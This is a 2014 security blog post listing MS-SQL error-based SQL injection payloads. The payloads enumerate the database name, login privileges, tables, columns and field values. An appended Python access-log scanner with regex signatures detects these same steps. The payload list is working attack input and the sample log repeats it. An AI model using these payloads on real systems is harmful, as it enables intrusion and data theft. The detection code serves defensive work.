
MSSQL Error Based SQL Injection

category Security/Web 2014. 10. 24. 02:09

[MS-SQL Error Based SQLi]


0. Database name lookup

- ' and 1=(db_name())--


1. Login account and privilege lookup

- ' and 1=(select system_user as 'login name')--

- ' and 1=(select system_user)--

- ' and quotename(is_srvrolemember('sysadmin','sa'))=0--

- ' and quotename(is_srvrolemember(0x730079007300610064006D0069006E))=0--

(is_srvrolemember returns 1 for true and 0 for false)


2. User name lookup

- ' and 1=(user)--

- ' and 1=(select user as 'user name')--

- ' and 0<>user--


3. Obtaining table names

- ' and 1=(select name from (select row_number() over(order by name) as rowid, name from sysobjects where xtype=0x55)T where rowid=1)--

(Enumerate the remaining names by incrementing rowid)


- ' and 1=(select top 1 name from sysobjects where xtype='u')--

- ' and 1=(select top 1 name from sysobjects where xtype=char(85))--

- ' and 1=(select top 1 name from sysobjects where xtype='u' and name not in('테이블명'))--


4. Looking up the object ID of a user-created table

- ' and 1=(select id from sysobjects where xtype='u' and name='테이블명' and uid>(str(id)))-- 


5. Obtaining column names

- ' and 1=(select name from(select row_number() over(order by col.name) as rowid,col.name from sysobjects tab,syscolumns col where tab.id=col.id and tab.name='테이블명')T where rowid=1)--

(Enumerate the remaining names by incrementing rowid)


- ' and 1=(select top 1 name from syscolumns where id=테이블id)--

- ' and 1=(select top 1 name from syscolumns where id=테이블id and name not in('컬럼명'))--


6. Retrieving field values

- ' and 1=(select top 1 컬럼명 from 테이블명)--

- ' and 1=(select top 1 컬럼명 from 테이블명 where 컬럼명 not in('첫번째값'))--
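
A defender-side complement to the payload list above, as an added example that is not part of the original post: a small Python scanner that flags the enumeration steps catalogued here (conversion-error probes, system_user/is_srvrolemember checks, sysobjects/syscolumns walks with row_number or not in) in web-server access logs. The signature names, the log format, the host paths and the client addresses are all constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the enumeration steps listed above, applied to the URL-decoded,
# lower-cased request path from a Common Log Format access-log line.
SIGNATURES = {
    # "' and 1=(select ...)" or "' and 0<>user": an integer is compared with a
    # string result so the type-conversion error carries the value back
    "conversion-error probe": re.compile(
        r"\b(?:and|or)\s+\d+\s*(?:=|<>)\s*\(?\s*(?:user\b|db_name\(\)|select\b)"),
    "login/privilege check": re.compile(r"\bsystem_user\b|\bis_srvrolemember\s*\("),
    # sysobjects filtered to user tables, whether xtype is quoted, hex or char()
    "table enumeration": re.compile(r"\bsysobjects\b.*\bxtype\s*=\s*(?:'u'|0x55|char\(85\))"),
    "column enumeration": re.compile(r"\bsyscolumns\b"),
    # walking result rows one at a time with row_number() or "not in(...)"
    "row-by-row walk": re.compile(r"\brow_number\s*\(\s*\)\s*over\s*\(|\bnot\s+in\s*\("),
}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')


def normalise(path: str) -> str:
    """Decode %xx and + twice (catches double encoding), then lower-case."""
    return unquote_plus(unquote_plus(path)).lower()


def match_signatures(path: str) -> list:
    text = normalise(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_access_log(lines):
    """Return (client_ip, status, [techniques]) for every matching log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        found = match_signatures(path)
        if found:
            hits.append((ip, int(status), found))
    return hits


# Constructed sample log (hypothetical host, paths and addresses): two benign
# requests and three steps of the enumeration sequence from one client.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Oct/2014:02:09:00 +0900] "GET /board/view.asp?id=12 HTTP/1.1" 200 5123',
    '10.0.0.9 - - [24/Oct/2014:02:09:07 +0900] "GET /board/view.asp?id=12%27+and+1%3D(select+system_user)-- HTTP/1.1" 500 612',
    '10.0.0.9 - - [24/Oct/2014:02:09:12 +0900] "GET /board/view.asp?id=12%27+and+1%3D(select+top+1+name+from+sysobjects+where+xtype%3D0x55)-- HTTP/1.1" 500 640',
    '10.0.0.9 - - [24/Oct/2014:02:09:20 +0900] "GET /board/view.asp?id=12%27+and+1%3D(select+name+from(select+row_number()+over(order+by+col.name)+as+rowid,col.name+from+sysobjects+tab,syscolumns+col+where+tab.id%3Dcol.id)T+where+rowid%3D2)-- HTTP/1.1" 500 655',
    '10.0.0.7 - - [24/Oct/2014:02:10:01 +0900] "GET /search.asp?q=user+guide HTTP/1.1" 200 2200',
]
```

Each hit pairs the client address with the HTTP status, so the 500 responses that error-based probing produces show up next to the matched step; tune the regexes to your own application's parameter names before relying on them.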
